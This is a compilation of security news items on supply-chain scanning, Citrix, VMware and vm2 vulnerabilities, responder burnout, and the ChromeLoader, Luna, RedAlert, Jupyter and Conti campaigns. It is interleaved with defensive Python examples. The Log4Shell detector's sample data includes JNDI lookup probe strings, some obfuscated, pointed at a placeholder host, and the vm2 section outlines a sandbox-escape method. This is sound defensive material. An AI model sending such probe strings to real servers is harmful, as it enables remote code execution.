As the cybersecurity strategy team at Sysdig observes, teams reuse existing code rather than building systems from scratch: this reduces engineering effort, enables operational scalability, and speeds delivery. Open-source software (OSS) generally has a high reputation for reliability because of the public scrutiny its open nature invites. Software is, of course, a constantly changing field, and problems can arise from coding errors or dependency problems; moreover, advances in testing and exploitation techniques mean new issues are discovered over time. 

Supply Chain Vulnerabilities: How to Address Them

To secure the modern design of an organization, it must have the appropriate tools and processes in place. In this rapidly changing environment, traditional approaches based on vulnerability management or point-in-time assessments cannot be relied upon alone. Even though regulations may still permit these approaches, they perpetuate the division between "secure" and "compliant." Most organizations aim to reach some level of maturity in DevOps, and DevOps practices share the characteristics of being continuous and automated. Security processes should be no different: the security strategist must maintain a steady focus on security throughout development, testing, and deployment, and during runtime. 

Continuously scan code in CI/CD: In addition to following best security practices (e.g., shift left), you need to recognize that you will not be able to scan all the code and nested code. Several factors can limit the success of shift-left approaches: scanner effectiveness, correlation of scanner output, automation of release decisions, and scanner completion within the release timeframes. The right tool can help you prioritize the risks associated with your findings, since not every finding is exploitable in your architecture, and some vulnerabilities may not be exploitable at all. 

Continuously scan during delivery: it is essential to prevent component compromises and environment drift. The digital supply chain, the process by which applications, infrastructure, and workloads are sourced from registries and repositories and booted up from them, needs to be scanned in case something has been compromised along the way. 

Continually scan at runtime: To protect against cyber threats, most organizations are looking to scan continually at runtime, and security monitoring is the backbone of that effort. As part of your system architecture, you need mechanisms to collect, correlate, and interpret telemetry from all types of systems, including cloud environments, containers, and Kubernetes deployments. Insights collected at runtime should feed back into the earlier stages of the build and delivery process. Identities and services, and the interactions between them, belong in that picture as well.
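To make the three scanning stages concrete, here is an added example (not from the original article or from Sysdig's tooling). It checks a pinned dependency list against an advisory table and ranks the hits by whether the affected package was observed loaded at runtime, so that runtime insight drives the prioritisation the text calls for. All package names, versions and advisory identifiers in it are constructed placeholders, not real advisories.

```python
"""Dependency scan with runtime-based prioritisation.

Added example, not from the original article or from Sysdig. It checks a
pinned dependency list against a small advisory table and ranks the hits by
whether the affected package was actually observed loaded at runtime. All
package names, versions and advisory ids below are constructed placeholders.
"""
import re

# Constructed lockfile content in "name==version" form.
LOCKFILE = """\
webframework==4.1.2
log-shipper==2.14.0
crypto-helper==1.0.9
image-tools==3.3.0
"""

# Constructed advisory table: package -> (advisory id, first fixed version).
# Every version strictly below the fixed version is treated as affected.
ADVISORIES = {
    "log-shipper": ("ADV-EXAMPLE-0001", "2.15.0"),
    "crypto-helper": ("ADV-EXAMPLE-0002", "1.1.0"),
    "image-tools": ("ADV-EXAMPLE-0003", "3.2.0"),
}

# Constructed runtime telemetry: packages actually imported by the workload.
RUNTIME_LOADED = {"webframework", "log-shipper"}


def parse_version(text):
    """Turn '2.14.0' into (2, 14, 0) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in re.findall(r"\d+", text))


def parse_lockfile(text):
    """Return {package: pinned_version} from a name==version list."""
    deps = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, version = line.split("==", 1)
        deps[name.strip()] = version.strip()
    return deps


def scan(deps, advisories, runtime_loaded):
    """Return findings sorted so runtime-loaded vulnerable packages come first."""
    findings = []
    for name, version in deps.items():
        if name not in advisories:
            continue
        adv_id, fixed = advisories[name]
        if parse_version(version) < parse_version(fixed):
            findings.append({
                "package": name,
                "installed": version,
                "fixed_in": fixed,
                "advisory": adv_id,
                "loaded_at_runtime": name in runtime_loaded,
            })
    # Highest priority: affected and actually loaded in the running workload.
    findings.sort(key=lambda f: (not f["loaded_at_runtime"], f["package"]))
    return findings


def scan_demo():
    """Run the scan over the constructed lockfile, advisories and runtime data."""
    return scan(parse_lockfile(LOCKFILE), ADVISORIES, RUNTIME_LOADED)


if __name__ == "__main__":
    for f in scan_demo():
        flag = "RUNTIME" if f["loaded_at_runtime"] else "static "
        print(f"[{flag}] {f['package']} {f['installed']} < {f['fixed_in']} ({f['advisory']})")
```

In a real pipeline the advisory table would come from a vulnerability feed and the runtime set from the monitoring layer described in the third step; the point of the ranking is that a vulnerable library that is never loaded can wait, while one in the running workload cannot.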

A sound security strategy and cybersecurity preparedness are essential in the wake of the latest OpenSSL vulnerability and Log4Shell. CVE IDs are merely identifiers for vulnerabilities known to exist in publicly available software or hardware; many vulnerabilities remain unreported, particularly those rooted in undocumented code or resulting from environmental misconfiguration or homegrown code. Modern designs are built on distributed and diverse technologies, and cybersecurity strategies must take this into account. Managing vulnerabilities requires a modern tool that uses runtime insights so that engineering teams can prioritize remediation based on the information they have. Additionally, to avoid being caught out by sudden attacks, you need the ability to detect and respond to threats across a wide range of environments.

Patch ASAP: Critical Citrix and VMware Bugs Threaten Takeover of Remote Workspaces

Critical authentication-bypass vulnerabilities in Citrix and VMware offerings are threatening devices running remote workspaces with complete takeover, the vendors warned this week. 

Given both vendors' history of being exploited, CISA on Wednesday issued alerts on both disclosures, warning admins to prioritize patching. 

Citrix Gateway, A Perfect Avenue for Infesting Orgs: 

As for Citrix, a critical vulnerability tracked as CVE-2022-27510 (with a CVSS vulnerability-severity score of 9.8 out of 10) allows unauthorized access to the Citrix Gateway when the device is used as an SSL VPN solution, which allows access to internal company applications from any device over the Internet and offers single sign-on across applications and devices. 

The vulnerability therefore gives a threat actor an easy means of initial access, from which to dig deeper into an organization's cloud footprint and cause trouble across the network. 

In a published advisory, Citrix also noted that its Application Delivery Controller (ADC) product, which provides admin visibility into applications across multiple cloud instances, is vulnerable to remote desktop takeover (CVE-2022-27513, CVSS 8.3) and brute-force protection bypass (CVE-2022-27516, CVSS 5.3). 

According to researcher Satnam Narang, Citrix Gateway and ADC have always been favorite targets of cybercriminals because of how many parts of an organization they provide entry into, which underscores the importance of patching. 

"Citrix ADC and Gateways have been routinely targeted by a number of threat actors over the last few years through the exploitation of CVE-2019-19781, a critical path traversal vulnerability that was first disclosed in December 2019 and subsequently exploited beginning in January 2020 after exploit scripts for the flaw became publicly available," Narang wrote in a Wednesday blog. 

"CVE-2019-19781 has been leveraged by state-sponsored threat [actors] with ties to China and Iran, as part of ransomware attacks against various entities including the healthcare sector, and was recently included as part of an updated list of the top vulnerabilities exploited by the People's Republic of China state-sponsored actors from early October," he added. 

Users should be quick in updating to Gateway versions 13.1-33.47, 13.0-88.12, and 12.1-65.21 to patch the latest issues. 

VMware Workspace ONE Assist, a trio of cybercrime threat: 

On the other hand, VMware has reported three authentication-bypass bugs, all in its Workspace ONE Assist for Windows. The bugs (CVE-2022-31685, CVE-2022-31686, and CVE-2022-31687, all with CVSS 9.8) allow both local and remote attackers to gain administrative privileges without needing to authenticate, giving them full run of targeted devices. 

Workspace ONE Assist is a remote desktop product mainly used by tech support to troubleshoot and fix IT issues for employees from afar. As such, it operates with the highest levels of privilege, potentially giving remote attackers an ideal initial access target and a pivot point to other corporate resources. 

Moreover, VMware revealed two additional vulnerabilities in Workspace ONE Assist. One is a cross-site scripting (XSS) flaw (CVE-2022-31688, CVSS 6.4); the other (CVE-2022-31689, CVSS 4.2) allows a "malicious actor who obtains a valid session token to authenticate to the application using that token," the vendor's Tuesday advisory notes. 

VMware also has a history of being targeted by cybercriminals. After a major vulnerability in Workspace ONE Access (used to distribute corporate apps to remote employees), identified as CVE-2022-22954, was revealed in April, a proof-of-concept (PoC) exploit was almost immediately published on GitHub and tweeted out to the world. 

Consequently, researchers from multiple security firms started seeing probes and exploit attempts very soon thereafter — with the ultimate motive of infecting targets with malware or establishing a backdoor via Log4Shell. 

Users are advised to update Workspace ONE Assist to version 22.10 in order to patch all of the most recently disclosed problems.   

RCE Vulnerability patched in vm2 Sandbox

Researchers from Oxeye found a serious vm2 vulnerability (CVE-2022-36067) that carries the highest possible CVSS score of 10.0. R&D executives, AppSec engineers, and security experts whose applications use the vm2 sandbox must make sure they patch it rapidly because of this new vulnerability, known as SandBreak.

The most widely used JavaScript sandbox library is vm2, which receives about 17.5 million downloads each month. It offers a widely used software testing framework that can synchronously execute untrusted code in a single process.

The primary culprit in the vulnerability, which Oxeye's researchers have dubbed SandBreak, is the Node.js functionality that lets vm2's maintainers customize the call stack of errors raised inside the software testing framework.

According to senior security researcher Gal Goldshtein of Oxeye, "when examining the prior issues revealed to the vm2 maintainers, we observed an unusual technique: the bug reporter leveraged the error mechanism in Node.js to escape the sandbox."

Modern applications use sandboxes for a variety of functions, including inspecting attached files in email servers, adding an extra layer of protection in web browsers, and isolating running programs in some operating systems. An attacker who exploits this vulnerability could bypass the vm2 sandbox and execute shell commands on the computer hosting it.

Because of the use cases sandboxes serve, the vm2 vulnerability can have serious repercussions for apps that use vm2 without the fix. Given that the vulnerability carries the highest CVSS score and vm2 is so widely used, its potential impact is both significant and extensive.

Because vm2's sandboxing did not cover every such method, an attacker could supply an alternative implementation of the prepareStackTrace method and escape the sandbox.

The researchers at Oxeye were able to substitute their own implementation, which contained a custom prepareStackTrace function for the global Error object. When it was called, it obtained a CallSite object from outside the sandbox, enabling arbitrary code execution on the host.

Given the vulnerability's severity, users are advised to upgrade to the most recent version as quickly as possible to reduce the risk.

Responding to Cyberattacks Within 72 Hours is Essential to Taming the Chaos

Cybersecurity professionals tasked with responding to attacks experience stress, burnout, and mental health issues, which are aggravated by the widespread lack of breach preparedness and inadequate incident response practices in organizations.

A study sponsored by IBM Security this week found that two-thirds (67%) of incident responders experience stress and anxiety at least sometimes during their engagements. In the survey, conducted by Morning Consult, 44% of respondents said they have sacrificed the well-being of their relationships and 42% have suffered burnout. According to the survey, 68% of incident responders have worked on two or more incidents at the same time, which adds to the stress of every incident they handle.

Just as organizations prepare for incidents such as a fire, an explosion, or another major event, John Dwyer, head of IBM Security's X-Force response team, says that organizing and practicing how to handle cyber incidents can reduce the level of stress for incident responders, employees, and executives.

Organizations are failing to design their response strategies with the responders in mind - "the response process does not have to be as stressful as it is today," he stressed. Because these attacks happen every single day and most organizations are not prepared for the crisis they cause, responders often end up having to manage the organization itself during an incident.

The IBM Security-funded study underscores why the cybersecurity community has been focusing increasingly on the mental health of its members. About half (51%) of cybersecurity defenders have suffered burnout or extreme stress in the past year, according to a VMware survey of 3,000 cybersecurity professionals released in August 2021. Cybersecurity executives have also highlighted retention as an issue that affects the whole community, since it impacts companies' ability to attract and retain skilled workers.

The IBM survey of US-based incident responders found that 62% had sought mental health assistance as a result of their job, and that 82% said their employer had put in place an adequate program and services to handle this.

"I've worked on some really big incidents in the past with clients who were very prepared, and I found that to be a very satisfying experience," Dwyer explains. "During the past few years, several incidents have occurred where the company's incident response processes lacked the readiness to deal with the situation, which caused me a great deal of stress."

The survey found three main reasons incident response professionals chose the profession. A study by the American Management Association found that 36 percent of respondents cited a sense of duty to protect as their motivation, 19% said they were interested in solving problems, and a further 19% said they joined for the continuous learning opportunities.

Half of those surveyed cited managing expectations from multiple stakeholders as a top-three stressor, and 48% cited their sense of responsibility toward their client or business. One of the survey's most striking findings is how dedicated incident responders are to their roles: almost one-third (34%) work 13 or more hours a day during the most stressful periods of an incident response.

According to Dwyer, the general public does not realize how long hours these men and women work to keep people's lives and businesses from being disrupted.

ChromeLoader: Microsoft, VMware Warn of New Malware Campaigns

Microsoft and VMware are warning about the ongoing, widespread ChromeLoader malware campaign, which has led to "ongoing wide-ranging click frauds" later this year. 

ChromeLoader was initially known for hijacking browsers to redirect users to ad pages. The malware has since evolved into a broader threat by deploying more potent payloads that go beyond malvertising: variants of ChromeLoader have been dropping malicious browser extensions, Node-WebKit malware, and even ransomware on Windows PCs and Macs. 

Functioning of ChromeLoader 

Microsoft detected an ongoing widespread click-fraud campaign and attributed it to the threat actor DEV-0796. The attack begins with an ISO file that is downloaded when the user clicks a malicious ad, a browser redirect, or a YouTube comment. The attackers seek to profit, undetected, from clicks generated by the malicious browser extensions or Node-WebKit applications they have installed on the victim's device.  

Researchers from VMware's Carbon Black Managed Detection and Response (MDR) team said they have seen the malware's operators impersonating various legitimate services to lead users to ChromeLoader. The researchers observed hundreds of attacks involving variants of the malware, targeting multiple sectors including education, government, healthcare, and business services. 

"This campaign has gone through many changes over the past few months, and we don't expect it to stop [...] It is imperative that these industries take note of the prevalence of this threat and prepare to respond to it," the researchers warn. 

Rapid Evolution Of Malware

Earlier, the malware infected Chrome with a malicious extension that redirected user traffic to advertising sites, performing click fraud and generating income for the threat actors. "But, it later evolved into an 'info-stealer', stealing sensitive data stored in browsers and deploying zip bombs (i.e. malicious archive files) to crash systems, while still retaining its adware function," the researchers said in an advisory released on September 19. 

Because adware does not cause significant damage to a victim's system, analysts tend not to take the threat seriously. However, any software that can enter a system undetected, as ChromeLoader does, is an immediate threat to the user, since its operators can push further modifications that open up new monetization options for the malware. 

“The Carbon Black MDR team believes that this is an emerging threat that needs to be tracked and taken seriously [...] due to its potential for delivering more nefarious malware,” VMware said in the advisory. 

ESXi, Linux, and Windows Systems at Risk From New Luna Ransomware

Luna is a brand-new ransomware family written in Rust, making it the third strain to use the language after BlackCat and Hive, according to Kaspersky security researchers.

The experts who examined the ransomware's command-line options believe that Luna is a reasonably straightforward ransomware program. 

Luna ransomware

Luna uses an interesting encryption scheme that combines x25519 with AES. The researchers discovered that the Linux and ESXi samples, which are compiled from the same source code, differ only slightly from the Windows version.

Darknet forum advertisements for Luna imply that the ransomware is only meant to be used by affiliates who speak Russian. Due to spelling errors in the ransom note that are hard-coded into the malware, its main creators are also thought to be of Russian descent.

The Luna ransomware is also able to avoid automated static code analysis attempts by utilizing a cross-platform language.

"The source code used to compile the Windows version and the Linux and ESXi samples are identical. The remaining code is almost unchanged from the Windows version," the researchers added. Luna "confirms the trend for cross-platform ransomware," the researchers wrote, pointing out how attackers are able to target and strike at scale while avoiding static analysis, thanks to the platform flexibility of languages like Golang and Rust.

Nevertheless, because Luna is a recently identified criminal operation whose activities are still being monitored, very little is known about its victimology trends.

Black Basta

Researchers have also revealed information about the Black Basta ransomware group, which modified its software to target ESXi systems. By adding support for VMware ESXi, various ransomware families, including LockBit, HelloKitty, BlackMatter, and REvil, aim to widen their pool of potential targets.

The double-extortion attack model is used by Black Basta, a ransomware operation that has been operational since April 2022.

Researchers from Kaspersky said that operators had introduced a new feature that relies on launching the computer in safe mode before encrypting data and imitating Windows Services in order to maintain persistence.

Black Basta can avoid detection from a variety of endpoint security solutions by starting Windows in safe mode.

This New RedAlert Ransomware Targets Windows, Linux VMware ESXi Servers

RedAlert (aka N13V), a new ransomware threat that encrypts both Windows and Linux VMware ESXi systems, has been discovered. MalwareHunterTeam uncovered the new ransomware and published various screenshots of its data leak site. The ransomware is known as RedAlert because of a string in the ransom text. 

The attackers, however, refer to their operation internally as N13V in the Linux encryptor. The Linux encryptor is intended for use on VMware ESXi servers and includes command-line options that let attackers shut down any running virtual machines before encrypting data. 

RedAlert, like other enterprise-targeted ransomware operations, conducts double-extortion attacks in which data is taken and then ransomware is used to encrypt machines. The ransomware exclusively targets VMware ESXi virtual machine data, such as memory files, log files, virtual discs, and swap files. 

The ransomware encrypts certain file formats and appends the extension .crypt658 to the file names. In each folder it produces a ransom note entitled HOW TO RESTORE, which includes a description of the stolen data and a link to a TOR ransom payment site. One of RedAlert/N13V's features is the '-x' command-line option, which performs asymmetric cryptography performance testing with various NTRUEncrypt parameter sets. 

During encryption, the ransomware employs the NTRUEncrypt public-key encryption method, which supports several 'Parameter Sets' with varying degrees of protection. Aside from RedAlert, the only other ransomware known to use this form of encryption is FiveHands.  

RedAlert currently lists only one organisation as a victim, although this may change in the near future. Furthermore, the malware's support for both Windows and Linux shows that it intends to target a broader attack surface. As a result, enterprises should keep an eye on this threat, and always use encryption and access controls to safeguard critical information.

JupyterLab Web Notebooks Targeted by Unique Python-Based Ransomware


Researchers have revealed the first Python-based ransomware specifically tailored to target vulnerable Jupyter notebooks. Jupyter is a web-based interactive computing platform that allows editing and running programs through a browser. Python is not widely used for malware development; criminals notably prefer languages such as Go, DLang, Nim, and Rust. Nonetheless, this is not the first time Python has been used in a ransomware attack: in October 2021 Sophos disclosed Python ransomware that specifically targeted VMware ESXi systems. 

Jupyter Notebook is an open-source, web-based data visualization platform used in data science, computing, machine learning, and modular software to model data. The project supports over 40 programming languages and is used by Microsoft, IBM, and Google, as well as universities. According to Assaf Morag, a data analyst at Aqua Security, "the attackers got early access via misconfigured environments, then executed a ransomware script that encrypts every file on a particular path on the server and eliminates itself after execution to disguise the operation." 

The Python ransomware targets users who have unintentionally left their systems exposed. To observe the malware's activity, the researchers set up a honeypot with an exposed Jupyter notebook application. The ransomware operator logged in to the server, opened a terminal, downloaded a set of malicious tools including encryptors, and then manually generated a Python script. Although the attack halted before completing its mission, Team Nautilus gathered enough data to reproduce the remainder of the attack in a lab setting. The encryptor would copy and encrypt files, then remove any unencrypted data before deleting itself. 

"There are over 11,000 servers with Jupyter Notebooks which are internet-facing," Aqua researcher Assaf Morag stated. "Users can execute a brute force attack and perhaps obtain access to some of them — one would be amazed how easy it can be to predict these passwords. We believe the attack either timed out on the honeypot or the ransomware is still being evaluated before being used in real-world attacks." Unlike conventional ransomware-as-a-service (RaaS) schemes, Aqua Security described the attack as "simple and straightforward," noting that no ransom note was displayed during the process, which raises the possibility that the threat actor was experimenting with the modus operandi or that the honeypot timed out before it could be completed. 

Regardless, based on what they have, the researchers believe it is ransomware rather than a wiper. "Wipers typically exfiltrate data and delete it or simply wipe it," Morag continued. "We haven't observed any attempts to move the data outside the server, and the data wasn't just erased, it was encrypted with a password. This is even more evidence that this is a ransomware attack instead of a wiper."

Although evidence discovered during the incident study points to a Russian actor, citing similarities with prior cryptomining attacks focused on Jupyter notebooks, the attacker's identity remains unknown.
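The entry point described in this post is a misconfigured, internet-facing notebook that can be reached without a usable password. The following is an added example, not code from Aqua Security or the Jupyter project: a small audit that executes a classic Jupyter Notebook config file (these files are Python) against a stand-in `c` object and flags the exposed combination. The config keys it inspects (`c.NotebookApp.ip`, `.token`, `.password`, `.allow_remote_access`) are the classic notebook's keys as I know them and are assumptions here; both config texts are constructed samples, and the password hash in the hardened one is a placeholder.

```python
"""Audit a classic Jupyter Notebook config for the exposure the post describes.

Added example, not Aqua Security's or the Jupyter project's code. Assumes the
classic notebook's c.NotebookApp.* config keys. The config samples are constructed.
"""
import ipaddress


class _Section:
    """Tiny stand-in for a traitlets config object so config text can be executed."""

    def __init__(self):
        self.__dict__["_values"] = {}

    def __setattr__(self, key, value):
        self._values[key] = value

    def __getattr__(self, key):
        if key.startswith("__"):
            raise AttributeError(key)
        if key not in self._values:
            self._values[key] = _Section()  # nested section, e.g. c.NotebookApp
        return self._values[key]


def load_config(text):
    """Execute config text with a stand-in 'c' and return the NotebookApp settings.

    Jupyter config files are Python, so only run this on config you administer.
    """
    c = _Section()
    exec(text, {"c": c})
    section = c._values.get("NotebookApp")
    return dict(section._values) if section is not None else {}


def _is_loopback(ip):
    """'' and '*' mean all interfaces in the notebook; anything non-loopback is exposed."""
    if ip == "localhost":
        return True
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False


def audit(settings):
    """Return a list of findings; an empty list means no exposure was detected."""
    findings = []
    ip = settings.get("ip", "localhost")  # classic notebook default is loopback
    if not _is_loopback(ip):
        findings.append("listens on non-loopback address %r" % ip)
    if settings.get("allow_remote_access", False):
        findings.append("allow_remote_access is enabled")
    has_password = bool(settings.get("password", ""))
    token_disabled = settings.get("token") == ""  # explicit '' turns token auth off
    if not has_password and token_disabled:
        findings.append("no password and token auth disabled: unauthenticated access")
    return findings


# Constructed weak config: the internet-facing, passwordless pattern from the post.
WEAK_CONFIG = """
c.NotebookApp.ip = '0.0.0.0'
c.NotebookApp.port = 8888
c.NotebookApp.open_browser = False
c.NotebookApp.allow_remote_access = True
c.NotebookApp.token = ''
c.NotebookApp.password = ''
"""

# Constructed hardened config: loopback only (reach it over SSH or a TLS reverse
# proxy) and a password hash; the hash value below is a placeholder, not a real hash.
HARDENED_CONFIG = """
c.NotebookApp.ip = '127.0.0.1'
c.NotebookApp.port = 8888
c.NotebookApp.open_browser = False
c.NotebookApp.password = 'argon2:<placeholder hash from the notebook passwd() helper>'
"""

if __name__ == "__main__":
    print("weak:", audit(load_config(WEAK_CONFIG)))
    print("hardened:", audit(load_config(HARDENED_CONFIG)))
```

Point `load_config` at the contents of the server's `jupyter_notebook_config.py`; settings passed on the command line rather than in the file are not seen, so check the running process's arguments as well.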

Conti Ransomware Exploits Log4j Flaw to Hack VMware vCenter Servers


The critical Log4Shell exploit is being used by the Conti ransomware operation to obtain quick access to internal VMware vCenter Server instances and encrypt virtual machines. The group wasted no time in adopting the new attack vector, becoming the first "top-tier" operation to exploit the Log4j flaw. 

On December 9, a proof-of-concept (PoC) exploit for CVE-2021-44228, also known as Log4Shell, was made public. A day later, numerous actors began scanning the internet in search of vulnerable systems. Cryptocurrency miners, botnets, and a new ransomware strain called Khonsari were among the first to leverage the flaw. 

By December 15, state-backed hackers and initial access brokers, who sell network access to ransomware gangs, had joined the list of threat actors using Log4Shell. Conti, one of today's largest and most prolific ransomware groups with tens of full-time members, seems to have developed an early interest in Log4Shell, viewing it as a potential attack channel on Sunday, December 12. 

The group began seeking fresh victims the next day, with the intention of moving laterally to VMware vCenter networks, according to Advanced Intelligence (AdvIntel), a cybercrime and adversary-disruption firm. Log4Shell has impacted dozens of vendors, who have rushed to patch their products or provide workarounds and mitigations for customers. VMware is one of them, with 40 products listed as vulnerable. 

While the firm has suggested mitigations or fixes, a patch for the affected vCenter versions has yet to be released. Although vCenter servers are not generally accessible to the internet, there are a few scenarios in which an attacker may exploit the flaw.

“A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system and/or perform a denial of service attack” – VMware 

Log4Shell to move laterally 

"This is the first time this vulnerability entered the radar of a major ransomware group," according to a report shared with BleepingComputer. 

“The current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J exploit” - AdvIntel 

While most defenders focus on stopping Log4Shell attacks against internet-facing devices, the Conti ransomware operation demonstrates how the vulnerability can be leveraged to attack internal systems that aren't as well protected. 

Conti ransomware affiliates had already compromised the target networks and exploited vulnerable Log4j machines to obtain access to vCenter servers, according to the researchers. This indicates that Conti ransomware members used a different initial access vector to breach a network (RDP, VPN, email phishing) and are now using Log4Shell to move laterally within the network. 
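Because the exploitation described here happens on internal systems, the logs of internal applications (not just the perimeter) are where a Log4Shell attempt shows up. The following is an added example, not AdvIntel's or BleepingComputer's code: a detector that scans log lines for the CVE-2021-44228 trigger. Background I am adding, not stated in the post: Log4j 2 evaluates `${...}` lookups in logged text, the bug is triggered by a `${jndi:<scheme>://...}` lookup, and public detection rules fold nested `${lower:...}` and `${...:-x}` lookups back to plain text before matching, which this example does. The sample log lines are constructed.

```python
"""Spot Log4Shell (CVE-2021-44228) lookup strings in log data.

Added example, not from the post. Folds the nested lookups used to hide the word
'jndi' and then matches a JNDI lookup with a remote scheme. Sample lines are constructed.
"""
import re

# ${lower:x} / ${upper:x} -> x ; ${anything:-x} -> x (a lookup with a default value)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# What we actually care about: a JNDI lookup pointing at a remote directory service.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE
)


def normalize(text, max_rounds=10):
    """Resolve innermost case/default lookups repeatedly until nothing changes."""
    for _ in range(max_rounds):
        folded = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        folded = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), folded)
        if folded == text:
            break
        text = folded
    return text


def is_log4shell_probe(line):
    """True when the line carries a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every suspicious line."""
    return [
        (n, normalize(line))
        for n, line in enumerate(lines, 1)
        if is_log4shell_probe(line)
    ]


# Constructed sample in a common access-log shape; 203.0.113.0/24 is a documentation
# range. Lines 2-4 are probes written three ways, lines 1 and 5 are benign.
SAMPLE_LINES = [
    '10.0.0.7 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /ui/ HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '10.0.0.9 - - "GET /ui/ HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.5/a}"',
    '10.0.0.9 - - "GET /ui/ HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5/a}"',
    '10.0.0.7 - - "GET /ui/ HTTP/1.1" 200 "${java:version}"',
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LINES):
        print("line %d: %s" % (n, line))
```

Line 5 shows the detector's scope: it only fires on JNDI lookups, so a broader rule that alerts on any `${` arriving in an untrusted field (headers, usernames, form values) is a sensible companion, since no legitimate client sends Log4j lookup syntax.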

Conti, the successor to the notorious Ryuk ransomware, is a Russian-speaking group that has been in the ransomware business for a long time. The group has carried out hundreds of attacks, with its data leak site alone listing over 600 victim firms that did not pay a ransom; firms that paid the actor to have their data decrypted are not included in that count. The group has extorted more than $150 million from its victims in the last six months, according to AdvIntel.